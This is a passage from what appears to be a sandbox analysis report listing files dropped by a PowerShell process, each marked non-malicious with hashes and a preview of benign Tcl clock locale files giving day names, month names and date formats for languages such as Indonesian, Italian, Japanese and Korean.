                                                                                                                                                                                                                      SSDEEP:24:4aR83dcTcWKutdXaMmEfc2ftdT2dHblWZ0VT:43dQrKutdntdI8g
                                                                                                                                                                                                                      MD5:191ACF2E8A8F10A1360B283D42886382
                                                                                                                                                                                                                      SHA1:EE2C00D021381EA638B6CE3F395DEA5F8491ED9B
                                                                                                                                                                                                                      SHA-256:41C0C3D3B4491E9B36E719466503EFCD325175CB7824C4A5055CB113D347BE0F
                                                                                                                                                                                                                      SHA-512:29BC4F7D3FAE7DE392B175FEA76138FA823B7D9D0B051A19A73F7D36D51DE34E0D0C7C129867307ABF51FC92E70853C15BD96B8484AD21EAB0A8EB83B0411E03
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \.. "Min"\.. "Sen"\.. "Sel"\.. "Rab"\.. "Kam"\.. "Jum"\.. "Sab"].. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \.. "Minggu"\.. "Senin"\.. "Selasa"\.. "Rabu"\.. "Kamis"\.. "Jumat"\.. "Sabtu"].. ::msgcat::mcset id MONTHS_ABBREV [list \.. "Jan"\.. "Peb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Agu"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset id MONTHS_FULL [list \.. "Januari"\.. "Pebruari"\.. "Maret"\.. "April"\.. "Mei"\.. "Juni"\.. "Juli"\.. "Agustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""]..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.904408530699153
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo0kGMo0F/W3v6ay/5o0kT+3vR6HyFvn:4EnLB383wG33v6ay/wK3voSVn
                                                                                                                                                                                                                      MD5:FEB4D50576BF3E11A0A40FD29ABE35A7
                                                                                                                                                                                                                      SHA1:8CEAA187C8AA5EC101743060A877D039850964CA
                                                                                                                                                                                                                      SHA-256:BA7FC0C0452D3E482DB6E19BDF512CACED639BA72B92ED8F66D80B52FEA11AC0
                                                                                                                                                                                                                      SHA-512:8B5D18E3D6628F369FB387C8EF08CC80000E0CBE500972958F4AD75F1C2F0DD6058F9777BD7DD0D7C26E7ECAA65E5071E2BF51B560973E88637942116C7576FB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y".. ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                      Entropy (8bit):4.457417703528286
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83XVhVTeMVHGPbfXSmWzaZlfFxUQbW1U6ZY95n123etvmv3eTn:43Xz0b/uzaZtXUMw8n
                                                                                                                                                                                                                      MD5:ACF0452D5BB6D36A40061D2B0AF4D7A6
                                                                                                                                                                                                                      SHA1:9DF4D88F1962A672EFBDDE524550F7A5D02D446D
                                                                                                                                                                                                                      SHA-256:778BE3D6BFE2DFFB64FF1AFB9EC8351A3343B314CF93A68E8F7FD1073EE122BB
                                                                                                                                                                                                                      SHA-512:34CC02D7D28B5E161ED10250C214375561FD3D00979BFB8BCF3DB72A81BD9B7C225301528B400F7C54D8B6379F772EB6477D5D03F2CF7DC4DD19D22AEEC151B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \.. "sun."\.. "m\u00e1n."\.. "\u00feri."\.. "mi\u00f0."\.. "fim."\.. "f\u00f6s."\.. "lau."].. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nudagur"\.. "\u00feri\u00f0judagur"\.. "mi\u00f0vikudagur"\.. "fimmtudagur"\.. "f\u00f6studagur"\.. "laugardagur"].. ::msgcat::mcset is MONTHS_ABBREV [list \.. "jan."\.. "feb."\.. "mar."\.. "apr."\.. "ma\u00ed"\.. "j\u00fan."\.. "j\u00fal."\.. "\u00e1g\u00fa."\.. "sep."\.. "okt."\.. "n\u00f3v."\.. "des."\.. ""].. ::msgcat::mcset is MONTHS_FULL [list \.. "jan\u00faar"\.. "febr\u00faar"\.. "mars"\.. "apr\u00edl"\.. "ma\u00ed"\.. "j\u00fan\u00ed"\.. "j\u00fal\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1294
                                                                                                                                                                                                                      Entropy (8bit):4.282101355195382
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83JYEVI2vfYpQjAOnhWBIIsmdC2lkOKk+Z+FoPJ6G3vesvY:43JZVB8eAOnh4IzR2+J6G/eKY
                                                                                                                                                                                                                      MD5:3354A6FC06C298E33AA14163929E56EB
                                                                                                                                                                                                                      SHA1:C3005370DAE8A266AE21F7E2B871AEA5A656A155
                                                                                                                                                                                                                      SHA-256:1D72170B9F9028A237364F7CD7EA8B48BD4770E61922205CE862300103B13DE5
                                                                                                                                                                                                                      SHA-512:58B64D4F5827CA2A1BF2DDFD1F7EFDDBBD46709A6A9B7277E8EB386D80043A87ADDE2B3D5A49A934E8EB8F797BD735FADA1D22AD3DD856FFE9507F71B9E45CBA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \.. "dom"\.. "lun"\.. "mar"\.. "mer"\.. "gio"\.. "ven"\.. "sab"].. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \.. "domenica"\.. "luned\u00ec"\.. "marted\u00ec"\.. "mercoled\u00ec"\.. "gioved\u00ec"\.. "venerd\u00ec"\.. "sabato"].. ::msgcat::mcset it MONTHS_ABBREV [list \.. "gen"\.. "feb"\.. "mar"\.. "apr"\.. "mag"\.. "giu"\.. "lug"\.. "ago"\.. "set"\.. "ott"\.. "nov"\.. "dic"\.. ""].. ::msgcat::mcset it MONTHS_FULL [list \.. "gennaio"\.. "febbraio"\.. "marzo"\.. "aprile"\.. "maggio"\.. "giugno"\.. "luglio"\.. "agosto"\.. "settembre"\.. "ottobre"\.. "novembre"\.. "dicembre"\.. "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):250
                                                                                                                                                                                                                      Entropy (8bit):4.8982877714191035
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoi5jL/oyJ+3v1oia+3vjLtAsvn:4EnLB383b3F+3vV3v3tnn
                                                                                                                                                                                                                      MD5:E4400C16406A46C2880250522BED2EDE
                                                                                                                                                                                                                      SHA1:787A04037A355FF845025B8865335EB938280BFB
                                                                                                                                                                                                                      SHA-256:24B5F303F5C7AF6F63FDC23ADB4D713087AE74B6D18C117D787AF03374C5F57E
                                                                                                                                                                                                                      SHA-512:3551DEEF0EAAC66042143F77F2F4DD9154764F35BD624DAB3C9F0F59F3489CA39CE34BC2A69BC5BFBB1926C6F5C39D74A806ECB1A47F6B374101071957FD417B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y".. ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                                                                      Entropy (8bit):4.951012555106795
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83Gl84OCtnbf3wvtMwvLv4GTwhvevTwSoXghGhD6h:43FULWttbdEVoES8gshD6h
                                                                                                                                                                                                                      MD5:11FBE427747012444AEEAFD6134034A4
                                                                                                                                                                                                                      SHA1:58C72C432053264EAE6335D6CC93C5FFA33C42B8
                                                                                                                                                                                                                      SHA-256:2B6D15A191437F1B84FA7023E34153B61E6BF1DE1452EA921E9CCBBE5D4BEB1C
                                                                                                                                                                                                                      SHA-512:4F993BDF5D50D6D9F7410C83D226FEF30BA8C989F9977A7025C36BE22CEECCD6C68CDD6AFC5C9CE3D700559C4EDC619042E14DD88EE7583B9D5AA66F0268FD23
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u6708"\.. "\u706b"\.. "\u6c34"\.. "\u6728"\.. "\u91d1"\.. "\u571f"].. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \.. "\u65e5\u66dc\u65e5"\.. "\u6708\u66dc\u65e5"\.. "\u706b\u66dc\u65e5"\.. "\u6c34\u66dc\u65e5"\.. "\u6728\u66dc\u65e5"\.. "\u91d1\u66dc\u65e5"\.. "\u571f\u66dc\u65e5"].. ::msgcat::mcset ja MONTHS_FULL [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"].. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d".. ::msgcat::mcset ja CE "\u897f\u66a6".. ::msgcat::mcset ja AM "\u5348\u524d".. ::msgcat::mcset ja PM "\u5348\u5f8c".. ::ms
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1025
                                                                                                                                                                                                                      Entropy (8bit):4.097746630492712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83E7XIE/OWbjH3Tw2PzJrIsmZ5maAXaMHPB:43WlrraA/vB
                                                                                                                                                                                                                      MD5:2F79804667D6F8C77BB188D59EF5F3DF
                                                                                                                                                                                                                      SHA1:10950ECA798F24A7C405B3E18B559CCC0C056EC1
                                                                                                                                                                                                                      SHA-256:96FF17F1CFF976E4E204D3616D1EFCED4D0F907C5E6A0F04B4536CB4AD1190C9
                                                                                                                                                                                                                      SHA-512:1B8ADC3B7FF920F8F53A17BFCC7EA24A0F8E276A42E5C63F9880DAE9B74E12716DD12DB647A80A9D99294449146C643EC58A33B03681AA4FA26A5FBC508C248C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \.. "sab"\.. "ata"\.. "mar"\.. "pin"\.. "sis"\.. "tal"\.. "arf"].. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \.. "sabaat"\.. "ataasinngorneq"\.. "marlunngorneq"\.. "pingasunngorneq"\.. "sisamanngorneq"\.. "tallimanngorneq"\.. "arfininngorneq"].. ::msgcat::mcset kl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset kl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "martsi"\.. "aprili"\.. "maji"\.. "juni"\.. "juli"\.. "augustusi"\.. "septemberi"\.. "oktoberi"\.. "novemberi"\.. "dece
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.882476709336307
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoEpb53FuoEpLE3vLjoEpLE3v6mjoEpba+3vnFDoAkvn:4EnLB383jF3Fyw3vxw3v6A/3v9dmn
                                                                                                                                                                                                                      MD5:255830678C8724E65C05A7E020E68B5B
                                                                                                                                                                                                                      SHA1:0AEA48AB0439C04F92B5CA9A3B5182718B7F116B
                                                                                                                                                                                                                      SHA-256:3027CFE9EBD2172CEFC15C025786CAD47A6E2894BF0474AFC1B0C341E70202AA
                                                                                                                                                                                                                      SHA-512:99039FFA7269DD136D1693121E261DB5586E86EC401D2B1EB8FB1D13A9A7F1E514D9FC941B838286B986C02ED281828ED67E59002D837E350A64F4832340516A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y".. ::msgcat::mcset kl_GL TIME_FORMAT "%T".. ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T".. ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1621
                                                                                                                                                                                                                      Entropy (8bit):4.612163420716489
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43fMlylslXlslxl1hVuqLGuqqntH4xUyw9:2fKYqVq3f
                                                                                                                                                                                                                      MD5:CCB2C2254D3FA3025183DB7E010CAD66
                                                                                                                                                                                                                      SHA1:510BBB6A9162F2EF908E6561CC714848C2EA74CA
                                                                                                                                                                                                                      SHA-256:EF6FB319C398EEA79B3A951319F831F3B186D556565D17D738E5F9B4B77570F2
                                                                                                                                                                                                                      SHA-512:A0264565899BD1B0783ADC0388F893CCE713ADB23BDD63907CF092A74ACB4F7D3BE09DA29801E9C11A7B08CB1706E3771C598ACED351A0FCCBF4EBBD7871148D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko DAYS_OF_WEEK_ABBREV [list \.. "\uc77c"\.. "\uc6d4"\.. "\ud654"\.. "\uc218"\.. "\ubaa9"\.. "\uae08"\.. "\ud1a0"].. ::msgcat::mcset ko DAYS_OF_WEEK_FULL [list \.. "\uc77c\uc694\uc77c"\.. "\uc6d4\uc694\uc77c"\.. "\ud654\uc694\uc77c"\.. "\uc218\uc694\uc77c"\.. "\ubaa9\uc694\uc77c"\.. "\uae08\uc694\uc77c"\.. "\ud1a0\uc694\uc77c"].. ::msgcat::mcset ko MONTHS_ABBREV [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\.. "7\uc6d4"\.. "8\uc6d4"\.. "9\uc6d4"\.. "10\uc6d4"\.. "11\uc6d4"\.. "12\uc6d4"\.. ""].. ::msgcat::mcset ko MONTHS_FULL [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):354
                                                                                                                                                                                                                      Entropy (8bit):5.058233326545794
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo56SFZhjAo56m5Ys5o56TGMovBo56a/W3v6mfKo56TT+3+:4EnLB383g62vjV6m5Ysg6TG26a+3v6oo
                                                                                                                                                                                                                      MD5:58CA45CE26AF8ECA729BA72898BB633D
                                                                                                                                                                                                                      SHA1:CBBEDB7370890A1DB65080A359A9A5C164B525D5
                                                                                                                                                                                                                      SHA-256:4CAC8FB43D290A63A4D3215F22228B358AB4FA174F08712DD6C5B64C5E485071
                                                                                                                                                                                                                      SHA-512:48CCBD3F7B96D0998B6D1A1F8D7FE2B4B070BB5B8809FABE0A38209AEAF2E95E098292A5B9B5F0954E7729708A2173D32AAD70B6C0F336DB1E9BFA2968E6A56B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko_KR BCE "\uae30\uc6d0\uc804".. ::msgcat::mcset ko_KR CE "\uc11c\uae30".. ::msgcat::mcset ko_KR DATE_FORMAT "%Y.%m.%d".. ::msgcat::mcset ko_KR TIME_FORMAT_12 "%P %l:%M:%S".. ::msgcat::mcset ko_KR DATE_TIME_FORMAT "%Y.%m.%d %P %l:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1997
                                                                                                                                                                                                                      Entropy (8bit):4.202940482570495
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83cm48Vc7VczMmDNVcYVcR0prdSmS68FeDJVcYVcR0prdSmS68FeuT:4354a+0prjS68mq0prjS68pT
                                                                                                                                                                                                                      MD5:67FA08F588A3B44D67E42EC1025013BC
                                                                                                                                                                                                                      SHA1:6895FEF0476DE0349895DB052B335AC46636B23A
                                                                                                                                                                                                                      SHA-256:9D215E31A39FED45B3657144E5F73C942E59E500036CE16B1FFF201FD6358595
                                                                                                                                                                                                                      SHA-512:4C2708BD9DD98320D3133EEFFD19A8018F49A36AB8348DB7C0B0287ADB4C052D3EFAD3686C8E46E0520F3CE27F361978272BA8752EB04E5A7BC07780398480DB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok DAYS_OF_WEEK_FULL [list \.. "\u0906\u0926\u093f\u0924\u094d\u092f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset kok MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):260
                                                                                                                                                                                                                      Entropy (8bit):4.904340548436718
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo5VsNv+IZo5VsU3v6ry/5o5VsNo+3v+6f6HyFvn:4EnLB383gVsNvlAVsU3v6ry/gVsNF3vj
                                                                                                                                                                                                                      MD5:0AA20289A63BA3A14DCFED75EED980DE
                                                                                                                                                                                                                      SHA1:2B76013593D886B0724D82849FD1840B20922902
                                                                                                                                                                                                                      SHA-256:644F2B6D4BA27AF14891B781DEF60F708A9F18FC2F73566649B631A6DEA3EF09
                                                                                                                                                                                                                      SHA-512:6E13E0DC8BFD2ABE0D04B0BC098C40972F088F8D3D6ACA00338B17473ABC6F69840A88EC0C965C493B4270DEC777A0EA2D762BC33044EFE7030E437604EE201B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset kok_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset kok_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1013
                                                                                                                                                                                                                      Entropy (8bit):4.060027087416375
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83no1UwRlw4MAwBdc//3rpF6HFoot8:43vglHM7MTCHFs
                                                                                                                                                                                                                      MD5:CCEC7B77DCA1F6A406311FC43EE57030
                                                                                                                                                                                                                      SHA1:4ED329BB09A8F7C67F8984CD790E9B6819DE6F00
                                                                                                                                                                                                                      SHA-256:EAB468AC5BF1833D4F8CD658789413D4A46CAD16B63FB9B906CFF6DC9EA26251
                                                                                                                                                                                                                      SHA-512:4EFF6E49CC479A1BF0CEEAE256A1FAE7D4AE7D0ACE23CD87851471EC96BB5AF580C58A142E1B6CE72BC8B6BFF946A38801E681443B7DD9527A1DEB6E7EDD7D22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw DAYS_OF_WEEK_ABBREV [list \.. "Sul"\.. "Lun"\.. "Mth"\.. "Mhr"\.. "Yow"\.. "Gwe"\.. "Sad"].. ::msgcat::mcset kw DAYS_OF_WEEK_FULL [list \.. "De Sul"\.. "De Lun"\.. "De Merth"\.. "De Merher"\.. "De Yow"\.. "De Gwener"\.. "De Sadorn"].. ::msgcat::mcset kw MONTHS_ABBREV [list \.. "Gen"\.. "Whe"\.. "Mer"\.. "Ebr"\.. "Me"\.. "Evn"\.. "Gor"\.. "Est"\.. "Gwn"\.. "Hed"\.. "Du"\.. "Kev"\.. ""].. ::msgcat::mcset kw MONTHS_FULL [list \.. "Mys Genver"\.. "Mys Whevrel"\.. "Mys Merth"\.. "Mys Ebrel"\.. "Mys Me"\.. "Mys Evan"\.. "Mys Gortheren"\.. "Mye Est"\.. "Mys Gwyngala"\.. "Mys Hedra"\.. "Mys Du"\.. "Mys Kevardhu"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.959913054070712
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoh6AvMoh633v6ay/5oh6Ao+3vR6HyFvn:4EnLB38346AvR633v6ay/46AF3voSVn
                                                                                                                                                                                                                      MD5:18E8576F63B978F1AFEF15AC57B44FBF
                                                                                                                                                                                                                      SHA1:D50EB90944FF81E3CBFF942B16C1874EB7EA2562
                                                                                                                                                                                                                      SHA-256:EDAC14D929D1C6559EC46E9B460F8F44A189B78FB915F2D641104549CBD94188
                                                                                                                                                                                                                      SHA-512:F3DE5EE77BB889DA1353F9C9A1811083AB28BBEE4B7D6C8782F38B1AE44CF77565371A0E18F7E2BACD7EF590BC1215CA3E41AF929A15F60B3E85F6099A4CF378
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset kw_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset kw_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1307
                                                                                                                                                                                                                      Entropy (8bit):4.506235846178408
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83iHYuAMLzHYCaNu3d3nT15T31FhAlDgK/YrDZ/6Qz2C9kGPCveksvc:43iHFnHuUd3/T3xM/+SQCC9kGPEekKc
                                                                                                                                                                                                                      MD5:D4EC2E96995E0EB263F338DD16CC4F8D
                                                                                                                                                                                                                      SHA1:7ED86175489B1AE3CA5C0E8D42969F951C895D6B
                                                                                                                                                                                                                      SHA-256:855B652FCC8066BA45C7DC8DBFD3807D1B4759EA8D71C523567F47BF445D1DE6
                                                                                                                                                                                                                      SHA-512:A55E0D759A22360FF6668CEFAFFB812BABB316C447ADDB1FD5CDBC06AE1DA2E891E09952D073164C013AD9BF4184614102E7ADA553EEEFB2BBA26208B79B277F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \.. "Sk"\.. "Pr"\.. "An"\.. "Tr"\.. "Kt"\.. "Pn"\.. "\u0160t"].. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \.. "Sekmadienis"\.. "Pirmadienis"\.. "Antradienis"\.. "Tre\u010diadienis"\.. "Ketvirtadienis"\.. "Penktadienis"\.. "\u0160e\u0161tadienis"].. ::msgcat::mcset lt MONTHS_ABBREV [list \.. "Sau"\.. "Vas"\.. "Kov"\.. "Bal"\.. "Geg"\.. "Bir"\.. "Lie"\.. "Rgp"\.. "Rgs"\.. "Spa"\.. "Lap"\.. "Grd"\.. ""].. ::msgcat::mcset lt MONTHS_FULL [list \.. "Sausio"\.. "Vasario"\.. "Kovo"\.. "Baland\u017eio"\.. "Gegu\u017e\u0117s"\.. "Bir\u017eelio"\.. "Liepos"\.. "Rugpj\u016b\u010dio"\.. "Rugs\u0117jo"\.. "Spa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1271
                                                                                                                                                                                                                      Entropy (8bit):4.460631492946299
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83Amshb4mZdA7nl9kMmfpK269rkbi5vWm0W9ARivirXsv05vkn:430bHA7XRr95QWQQgaKkn
                                                                                                                                                                                                                      MD5:554ED2CAFD25F5F82DA54AE057F4BA98
                                                                                                                                                                                                                      SHA1:E25CDF0F9C4B523B5B05408E7820F7B4F627D19E
                                                                                                                                                                                                                      SHA-256:7E90D2008B220DB19C796C7107AD69D263B8AC8C7BDDFB879230699D978E9A0A
                                                                                                                                                                                                                      SHA-512:612201CCD64A51EC943921196D8C74D8BCA3AB3E35B0C9E91AE7F3A6B36F4F255AA9ADB3A254EC03629B01BD221B0B3F8CC4DFBFAC1F1718775E81CAD188AA86
                                                                                                                                                                                                                      Malicious:false
